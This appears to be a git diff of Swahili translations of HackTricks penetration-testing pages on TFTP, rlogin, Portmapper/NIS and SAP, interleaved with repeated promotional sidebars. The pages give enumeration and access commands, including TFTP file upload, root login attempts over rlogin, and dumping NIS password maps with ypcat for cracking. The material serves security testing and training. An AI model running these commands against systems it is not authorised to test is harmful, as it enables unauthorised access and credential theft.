* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
# Taarifa Msingi
|
||||
|
||||
**Trivial File Transfer Protocol (TFTP)** ni itifaki rahisi inayotumiwa kwenye **bandari ya UDP 69** ambayo inaruhusu uhamishaji wa faili bila kuhitaji uwakilishi. Iliyobainishwa katika **RFC 1350**, urahisi wake una maana kuwa haina huduma muhimu za usalama, hivyo inatumika kidogo kwenye mtandao wa umma. Hata hivyo, **TFTP** inatumika sana ndani ya mitandao mikubwa ya ndani kwa kusambaza faili za **mipangilio** na **picha za ROM** kwa vifaa kama **simu za VoIP**, kutokana na ufanisi wake katika mazingira haya maalum.
|
||||
**Itifaki ya Uhamishaji wa Faili wa Trivial (TFTP)** ni itifaki rahisi inayotumika kwenye **bandari ya UDP 69** ambayo inaruhusu uhamisho wa faili bila kuhitaji uthibitisho. Iliyotajwa katika **RFC 1350**, unyenyekevu wake una maana haina vipengele muhimu vya usalama, ikisababisha matumizi madogo kwenye Mtandao wa Umma. Walakini, **TFTP** inatumiwa sana ndani ya mitandao mikubwa ya ndani kwa kusambaza **faili za usanidi** na **picha za ROM** kwa vifaa kama **simu za VoIP**, shukrani kwa ufanisi wake katika hali hizi maalum.
|
||||
|
||||
**TODO**: Toa taarifa kuhusu ni nini Bittorrent-tracker (Shodan inatambua bandari hii kwa jina hilo). Ikiwa una taarifa zaidi kuhusu hili, tujulishe kwa mfano kwenye [**kikundi cha telegram cha HackTricks**](https://t.me/peass) (au kwenye suala la github katika [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
|
||||
**TODO**: Toa habari kuhusu ni nini Bittorrent-tracker (Shodan inatambua bandari hii kwa jina hilo). Ikiwa una habari zaidi kuhusu hili tujulishe kwa mfano kwenye [**kikundi cha telegram cha HackTricks**](https://t.me/peass) (au kwenye suala la github katika [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
|
||||
|
||||
**Bandari ya Default:** 69/UDP
|
||||
```
|
||||
|
@ -26,13 +30,13 @@ PORT STATE SERVICE REASON
|
|||
```
|
||||
# Uchambuzi
|
||||
|
||||
TFTP haipatii orodha ya saraka, kwa hivyo hati ya `tftp-enum` kutoka `nmap` itajaribu kuvunja nguvu njia za chaguo-msingi.
|
||||
TFTP haitoi orodha ya saraka kwa hivyo script `tftp-enum` kutoka `nmap` itajaribu kuvunja nguvu njia za msingi.
|
||||
```bash
|
||||
nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>
|
||||
```
|
||||
## Pakua/Chapisha
|
||||
## Pakua/Pakia
|
||||
|
||||
Unaweza kutumia Metasploit au Python kuangalia ikiwa unaweza kupakua/kuchapisha faili:
|
||||
Unaweza kutumia Metasploit au Python kuangalia kama unaweza kupakua/pakia faili:
|
||||
```bash
|
||||
msf5> auxiliary/admin/tftp/tftp_transfer_util
|
||||
```
|
||||
|
@ -48,16 +52,21 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
|
|||
* `port:69`
|
||||
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,17 +6,22 @@
|
|||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Taarifa Msingi
|
||||
|
||||
Katika siku za nyuma, **rlogin** ilikuwa ikitumiwa sana kwa kazi za utawala wa kijijini. Walakini, kutokana na wasiwasi juu ya usalama wake, kwa kiasi kikubwa imebadilishwa na **slogin** na **ssh**. Njia hizi mpya zinatoa usalama ulioboreshwa kwa uhusiano wa kijijini.
|
||||
Awali, **rlogin** ilikuwa ikitumiwa sana kwa kazi za utawala wa mbali. Hata hivyo, kutokana na wasiwasi kuhusu usalama wake, kwa kiasi kikubwa imepita na **slogin** na **ssh**. Mbinu hizi mpya hutoa usalama bora kwa mawasiliano ya mbali.
|
||||
|
||||
**Bandari ya chaguo-msingi:** 513
|
||||
```
|
||||
|
@ -24,58 +29,35 @@ PORT STATE SERVICE
|
|||
513/tcp open login
|
||||
```
|
||||
## **Ingia**
|
||||
|
||||
Rlogin ni itifaki ya mtandao inayotumiwa kwa kuingia kwa mbali kwenye mfumo wa kompyuta. Inaruhusu mtumiaji kuingia kwenye mfumo mwingine kwa kutumia jina la mtumiaji na nenosiri. Itifaki hii inatumika sana katika mazingira ya UNIX na Linux.
|
||||
|
||||
### **Kugundua Huduma ya Rlogin**
|
||||
|
||||
Kabla ya kuanza kuingia kwa mbali kwa kutumia Rlogin, ni muhimu kugundua ikiwa huduma hii inapatikana kwenye mfumo wa lengo. Unaweza kutumia zana kama Nmap kuchunguza ikiwa bandari ya Rlogin (bandari 513) imefunguliwa.
|
||||
|
||||
### **Kuvunja Usalama wa Rlogin**
|
||||
|
||||
Ikiwa huduma ya Rlogin imefunguliwa na unataka kuvunja usalama wake, kuna njia kadhaa za kufanya hivyo. Hapa kuna baadhi ya mbinu zinazoweza kutumika:
|
||||
|
||||
1. **Brute Force**: Kwa kutumia programu kama Hydra au Medusa, unaweza kujaribu kuingia kwa kujaribu nenosiri tofauti hadi upate moja sahihi.
|
||||
|
||||
2. **Man-in-the-Middle (MITM)**: Kwa kuteka trafiki ya mtandao kati ya mtumiaji na mfumo wa lengo, unaweza kusoma na kubadilisha mawasiliano ya Rlogin. Hii inaweza kukusaidia kupata jina la mtumiaji na nenosiri.
|
||||
|
||||
3. **Exploiting Vulnerabilities**: Kama huduma ya Rlogin inatumia toleo la zamani au lina kasoro za usalama, unaweza kutumia mbinu za kuvunja ili kupata ufikiaji usioidhinishwa.
|
||||
|
||||
### **Kuzuia Mashambulizi ya Rlogin**
|
||||
|
||||
Ili kuzuia mashambulizi ya Rlogin, ni muhimu kuchukua hatua za usalama zifuatazo:
|
||||
|
||||
1. **Funga Huduma**: Ikiwa huduma ya Rlogin haihitajiki, ni bora kuifunga kabisa ili kuzuia upatikanaji usioidhinishwa.
|
||||
|
||||
2. **Tumia Nenosiri Imara**: Hakikisha kutumia nenosiri lenye nguvu na lisiloweza kutabiriwa kwa akaunti ya Rlogin.
|
||||
|
||||
3. **Tumia Itifaki Salama**: Badala ya kutumia Rlogin, ni bora kutumia itifaki salama kama SSH ambayo inatoa ufikiaji salama na kazi zaidi za usimamizi wa mbali.
|
||||
|
||||
Kwa kufuata hatua hizi za usalama, unaweza kuzuia mashambulizi ya Rlogin na kuhakikisha usalama wa mfumo wako.
|
||||
```bash
|
||||
# Install client
|
||||
apt-get install rsh-client
|
||||
```
|
||||
Unaweza kutumia amri ifuatayo kujaribu **kuingia** kwenye mwenyeji wa mbali ambapo **hakuna nenosiri** inayohitajika kwa ufikiaji. Jaribu kutumia **root** kama jina la mtumiaji:
|
||||
Unaweza kutumia amri ifuatayo kujaribu **kuingia** kwenye mwenyeji wa mbali ambapo **nywila** haihitajiki kwa ufikiaji. Jaribu kutumia **root** kama jina la mtumiaji:
|
||||
```bash
|
||||
rlogin <IP> -l <username>
|
||||
```
|
||||
### [Brute force](../generic-methodologies-and-resources/brute-force.md#rlogin)
|
||||
### [Kuvunja nguvu](../generic-methodologies-and-resources/brute-force.md#rlogin)
|
||||
|
||||
## Tafuta faili
|
||||
## Pata faili
|
||||
```
|
||||
find / -name .rhosts
|
||||
```
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# 111/TCP/UDP - Kupima Usalama wa Portmapper
|
||||
# 111/TCP/UDP - Kupima Portmapper
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -8,17 +8,22 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Taarifa Msingi
|
||||
|
||||
**Portmapper** ni huduma inayotumiwa kwa kufanya ramani ya bandari za huduma za mtandao kwa nambari za programu za **RPC** (Wito wa Mbali wa Utaratibu). Inafanya kazi kama sehemu muhimu katika **mifumo inayotumia Unix**, ikirahisisha kubadilishana taarifa kati ya mifumo hii. **Bandari** inayohusishwa na **Portmapper** mara nyingi huchunguzwa na wadukuzi kwani inaweza kufunua taarifa muhimu. Taarifa hizi ni pamoja na aina ya **Mfumo wa Uendeshaji wa Unix (OS)** unaotumika na maelezo kuhusu huduma zilizopo kwenye mfumo. Aidha, **Portmapper** mara nyingi hutumiwa pamoja na **NFS (Mfumo wa Faili wa Mtandao)**, **NIS (Huduma ya Taarifa ya Mtandao)**, na huduma zingine za **RPC** kusimamia huduma za mtandao kwa ufanisi.
|
||||
**Portmapper** ni huduma inayotumiwa kwa kufanya ramani ya bandari za huduma za mtandao kwa nambari za programu za **RPC** (Remote Procedure Call). Inafanya kazi kama sehemu muhimu katika **mifumo inayotumia Unix**, ikirahisisha kubadilishana taarifa kati ya mifumo hii. **Bandari** inayohusishwa na **Portmapper** mara nyingi huchunguzwa na wadukuzi kwani inaweza kufunua taarifa muhimu. Taarifa hizi ni pamoja na aina ya **Mfumo wa Uendeshaji wa Unix (OS)** unaotumika na maelezo kuhusu huduma zilizopo kwenye mfumo. Aidha, **Portmapper** mara nyingi hutumiwa pamoja na **NFS (Network File System)**, **NIS (Network Information Service)**, na huduma zingine za msingi wa **RPC** kusimamia huduma za mtandao kwa ufanisi.
|
||||
|
||||
**Bandari ya default:** 111/TCP/UDP, 32771 kwenye Oracle Solaris
|
||||
**Bandari ya chaguo:** 111/TCP/UDP, 32771 kwenye Oracle Solaris
|
||||
```
|
||||
PORT STATE SERVICE
|
||||
111/tcp open rpcbind
|
||||
|
@ -38,15 +43,15 @@ Ikiwa utapata huduma ya NFS basi labda utaweza kupata orodha na kupakua (na labd
|
|||
|
||||
![](<../.gitbook/assets/image (869).png>)
|
||||
|
||||
Soma [2049 - Pentesting NFS service](nfs-service-pentesting.md) kujifunza zaidi kuhusu jinsi ya kufanya majaribio kwenye itifaki hii.
|
||||
Soma [2049 - Pentesting NFS service](nfs-service-pentesting.md) kujifunza zaidi kuhusu jinsi ya kufanya majaribio ya itifaki hii.
|
||||
|
||||
## NIS
|
||||
|
||||
Kuchunguza udhaifu wa **NIS** kunahusisha mchakato wa hatua mbili, ukiwaanza na kutambua huduma ya `ypbind`. Msingi wa uchunguzi huu ni kugundua **jina la uwanja wa NIS**, bila ya hilo maendeleo hukwama.
|
||||
Kuchunguza udhaifu wa **NIS** kunahusisha mchakato wa hatua mbili, ukiwaanza na kutambua huduma ya `ypbind`. Msingi wa uchunguzi huu ni kugundua **jina la kikoa cha NIS**, bila ambayo maendeleo hukwama.
|
||||
|
||||
![](<../.gitbook/assets/image (856).png>)
|
||||
|
||||
Safari ya uchunguzi inaanza na usakinishaji wa pakiti muhimu (`apt-get install nis`). Hatua inayofuata inahitaji kutumia `ypwhich` kuthibitisha uwepo wa seva ya NIS kwa kuitikia kwa jina la uwanja na anwani ya seva, kuhakikisha vipengele hivi vimefichwa kwa usalama.
|
||||
Safari ya uchunguzi inaanza na usakinishaji wa pakiti muhimu (`apt-get install nis`). Hatua inayofuata inahitaji kutumia `ypwhich` kuthibitisha uwepo wa seva ya NIS kwa kuitikia kwa jina la kikoa na anwani ya seva, kuhakikisha vipengele hivi vimefichwa kwa usalama.
|
||||
|
||||
Hatua ya mwisho na muhimu inahusisha amri ya `ypcat` kutoa data nyeti, hasa nywila za watumiaji zilizofichwa. Vipande hivi, mara baada ya kuvunjwa kwa kutumia zana kama **John the Ripper**, hufunua ufahamu kuhusu ufikiaji wa mfumo na mamlaka.
|
||||
```bash
|
||||
|
@ -59,24 +64,24 @@ ypcat –d <domain-name> –h <server-ip> passwd.byname
|
|||
```
|
||||
### Faili za NIF
|
||||
|
||||
| **Faili Kuu** | **Ramani(z)** | **Maelezo** |
|
||||
| ---------------- | --------------------------- | ------------------------------------- |
|
||||
| **Faili Kuu** | **Ramani** | **Maelezo** |
|
||||
| ---------------- | --------------------------- | --------------------------------- |
|
||||
| /etc/hosts | hosts.byname, hosts.byaddr | Ina jina la mwenyeji na maelezo ya IP |
|
||||
| /etc/passwd | passwd.byname, passwd.byuid | Faili ya nenosiri ya mtumiaji wa NIS |
|
||||
| /etc/group | group.byname, group.bygid | Faili ya kikundi cha NIS |
|
||||
| /usr/lib/aliases | mail.aliases | Maelezo ya anwani za barua pepe |
|
||||
| /etc/passwd | passwd.byname, passwd.byuid | Faili ya nenosiri la mtumiaji wa NIS |
|
||||
| /etc/group | group.byname, group.bygid | Faili ya kikundi cha NIS |
|
||||
| /usr/lib/aliases | mail.aliases | Maelezo ya anwani za barua pepe |
|
||||
|
||||
## Watumiaji wa RPC
|
||||
|
||||
Ikiwa utapata huduma ya **rusersd** ikiwa imeorodheshwa kama hivi:
|
||||
Ikiwa unapata huduma ya **rusersd** ikiwa imeorodheshwa kama hii:
|
||||
|
||||
![](<../.gitbook/assets/image (1038).png>)
|
||||
|
||||
Unaweza kuchunguza watumiaji wa sanduku. Ili kujifunza zaidi soma [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
|
||||
Unaweza kuchunguza watumiaji wa sanduku. Ili kujifunza jinsi ya kufanya hivyo soma [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
|
||||
|
||||
## Kupita Kizuizi cha Portmapper iliyofungwa
|
||||
## Kupita Kizuizi cha Bandari ya Portmapper
|
||||
|
||||
Unapofanya **uchunguzi wa nmap** na kugundua milango ya NFS wazi na mlango wa 111 ukiwa umefungwa, utekelezaji moja kwa moja wa milango hii hauwezekani. Hata hivyo, kwa **kujenga huduma ya portmapper kwa njia ya ndani na kuunda handaki kutoka kwenye kifaa chako** kwenda kwenye lengo, utekelezaji unawezekana kwa kutumia zana za kawaida. Mbinu hii inaruhusu kupita hali iliyofungwa ya mlango wa 111, hivyo kuruhusu ufikiaji wa huduma za NFS. Kwa mwongozo kamili kuhusu mbinu hii, tazama makala inayopatikana kwenye [kiungo hiki](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc).
|
||||
Unapofanya **uchunguzi wa nmap** na kugundua bandari za NFS zilizofunguliwa na bandari 111 ikiwa imezuiwa, utekelezaji moja kwa moja wa bandari hizi hauwezekani. Walakini, kwa **kujenga huduma ya portmapper kwa njia ya kielelezo kwenye mashine yako** na kuanzisha handaki kutoka kwenye mashine yako kwenda kwenye lengo, utekelezaji unawezekana kwa kutumia zana za kawaida. Mbinu hii inaruhusu kupita hali iliyozuiwa ya bandari 111, hivyo kuruhusu ufikiaji wa huduma za NFS. Kwa mwongozo wa kina kuhusu mbinu hii, tazama makala inayopatikana kwa [kiungo hiki](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc).
|
||||
|
||||
## Shodan
|
||||
|
||||
|
@ -86,6 +91,10 @@ Unapofanya **uchunguzi wa nmap** na kugundua milango ya NFS wazi na mlango wa 11
|
|||
|
||||
* Fanyia mazoezi mbinu hizi kwenye [**Mashine ya HTB ya Irked**](https://app.hackthebox.com/machines/Irked).
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
## Amri za Kiotomatiki za HackTricks
|
||||
```
|
||||
Protocol_Name: Portmapper #Protocol Abbreviation if there is one.
|
||||
|
@ -118,7 +127,7 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
|
|
|
@ -1,39 +1,43 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
# Utangulizi kuhusu SAP
|
||||
|
||||
SAP inasimama kwa Systems Applications and Products in Data Processing. SAP, kwa ufafanuzi, pia ni jina la programu ya ERP \(Enterprise Resource Planning\) pamoja na jina la kampuni.
|
||||
Mfumo wa SAP unajumuisha moduli kadhaa zilizounganishwa kabisa, ambazo zinashughulikia karibu kila nyanja ya usimamizi wa biashara.
|
||||
Mfumo wa SAP unajumuisha moduli kadhaa zilizounganishwa kabisa, ambazo zinashughulikia karibu kila upande wa usimamizi wa biashara.
|
||||
|
||||
Kila kifaa cha SAP \(au SID\) kina safu tatu: database, application na presentation\), kila mazingira kawaida yana vifaa vinne: dev, test, QA na production.
|
||||
Kila safu inaweza kudukuliwa kwa kiwango fulani, lakini athari kubwa zaidi inaweza kupatikana kwa **kushambulia database**.
|
||||
Kila kifaa cha SAP \(au SID\) kimeundwa na safu tatu: database, application na presentation\), kila mandhari kawaida ina vipande vinne: dev, test, QA na production.
|
||||
Kila safu inaweza kutumiwa kwa kiwango fulani, lakini athari kubwa inaweza kupatikana kwa **kushambulia database**.
|
||||
|
||||
